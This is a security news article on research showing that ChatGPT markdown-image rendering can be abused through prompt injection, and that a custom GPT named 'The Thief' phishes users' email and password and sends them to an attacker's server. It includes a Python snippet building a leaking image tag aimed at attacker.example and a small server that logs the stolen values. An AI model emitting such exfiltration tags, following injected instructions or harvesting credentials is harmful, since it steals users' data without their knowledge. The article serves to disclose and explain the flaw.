Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server. 

Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of 2023 that ChatGPT was vulnerable to a prompt injection attack that involved the chatbot rendering markdown images. 

They demonstrated how an attacker could leverage image markdown rendering to steal potentially sensitive information from a user’s conversation with ChatGPT by getting the victim to paste apparently harmless but malicious content from the attacker’s website. The attack also works by asking ChatGPT to summarize the content from a website hosting specially crafted code. In both cases, the markdown image processed by the chatbot — which can be an invisible single-pixel image — is hosted on the attacker’s site.
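To make the mechanics concrete, below is a minimal sketch of the exfiltration channel in Python; the endpoint and parameter names are hypothetical and not taken from the researchers’ write-ups. A prompt injection instructs the chatbot to emit a markdown image tag like the one built here; when the client renders the invisible image, the fetch itself carries the conversation data to the attacker’s server in the URL.

    from urllib.parse import quote

    # Hypothetical attacker endpoint -- illustrative only.
    ATTACKER_ENDPOINT = "https://attacker.example/pixel.png"

    def exfil_markdown(stolen_text: str) -> str:
        """Build a markdown image tag whose URL leaks `stolen_text`.
        The image can be a single transparent pixel; the data travels
        in the query string of the request that renders it."""
        return f"![ ]({ATTACKER_ENDPOINT}?d={quote(stolen_text)})"

    print(exfil_markdown("summary of the victim's conversation"))
    # ![ ](https://attacker.example/pixel.png?d=summary%20of%20the%20victim%27s%20conversation)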

ChatGPT creator OpenAI was informed about the attack method at the time, but said it was a feature it did not plan to address. 

Rehberger said similar issues were found in chatbots such as Bing Chat, Google’s Bard and Anthropic’s Claude, whose developers released fixes. 

The researcher noticed this week that OpenAI has also started taking action to tackle the attack method. The mitigations have apparently been applied only to the web application, meaning the attack still works in the mobile apps, and they don’t completely prevent attacks. However, the researcher described it as a “step in the right direction.”

On December 12, before OpenAI started rolling out mitigations, Rehberger published a blog post describing how the image markdown injection issue can be exploited in combination with custom versions of ChatGPT. 

OpenAI announced in November that ChatGPT Plus and Enterprise users would be allowed to create their own GPTs, customized for specific tasks or topics. 

Rehberger created a GPT named ‘The Thief’ that attempts to trick users into handing over their email address and password, and then exfiltrates the data to an attacker-controlled external server without the victim’s knowledge. 

This GPT claims to play a game of Tic-tac-toe against the user and requires an email address for a ‘personalized experience’ and the user’s password as part of a ‘security process’. The provided information is then sent to the attacker’s server. 
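For illustration, a minimal sketch of what the collection side of such a scheme could look like follows; the host, port and path handling are invented for this example and are not taken from Rehberger’s research. The server simply records whatever the victim’s client leaks in a query string and replies as if serving an ordinary image.

    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.parse import urlparse, parse_qs

    class CollectorHandler(BaseHTTPRequestHandler):
        """Logs query parameters from incoming requests, e.g. the email
        and password a phishing GPT tricked the victim into providing."""

        def do_GET(self):
            params = parse_qs(urlparse(self.path).query)
            print("exfiltrated:", params)      # attacker records the data
            self.send_response(200)            # reply like a normal image fetch
            self.send_header("Content-Type", "image/png")
            self.end_headers()                 # empty body: the data already arrived

    if __name__ == "__main__":
        HTTPServer(("127.0.0.1", 8080), CollectorHandler).serve_forever()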

OpenAI has implemented a review system intended to prevent the publication of obviously malicious GPTs, but the researcher also showed how an attacker may be able to get such a malicious GPT published on the official GPT Store. 

SecurityWeek has reached out to OpenAI for comment on the security research and will update this article if the company responds. 

Related: Major Organizations Using ‘Hugging Face’ AI Tools Put at Risk by Leaked API Tokens

Related: Simple Attack Allowed Extraction of ChatGPT Training Data

Related: Over a Dozen Exploitable Vulnerabilities Found in AI/ML Tools

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
